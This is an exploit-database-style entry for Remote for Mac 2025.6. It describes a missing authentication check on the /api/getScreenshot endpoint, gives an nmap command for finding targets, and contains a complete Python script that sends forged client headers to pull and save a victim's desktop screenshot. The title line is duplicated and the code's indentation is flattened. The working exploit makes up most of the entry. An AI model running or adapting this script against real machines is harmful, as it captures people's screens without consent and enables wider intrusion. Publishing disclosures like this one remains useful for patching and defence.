# Exploit Title: Remote for Mac 2025.6 - Unauthenticated # Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop
Screenshot Capture
# Date: 2025-05-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6

'''
Description:
- Exploits the getScreenshot API endpoint in Remote for Mac application
- Works when "Allow unknown devices" setting is enabled (default: disabled)


Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks


# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with Subject:
commonName=SecureHTTPServer/organizationName=Deusty Designs,
LLC/stateOrProvinceName=Missouri/countryName=US
'''

#!/usr/bin/env python3

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def capture_screenshot(ip, port, output_file):
try:
response = requests.get(
f"https://{ip}:{port}/api/getScreenshot",
headers={
"X-ClientToken": "123456",
"X-HostName": "apple iMac",
"X-HostFullModel": "iMac17,1"
},
verify=False,
timeout=15
)
if response.status_code == 200 and
response.content.startswith(b'\xff\xd8'):
with open(output_file, 'wb') as f:
f.write(response.content)
print(f"[+] Saved: {output_file}")
return True
print(f"[-] Failed: HTTP {response.status_code}")
print(response.content)
return False
except Exception as e:
print(f"[-] Error: {str(e)}")
return False

if __name__ == "__main__":
if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>")
sys.exit(1)
sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3])
else 1)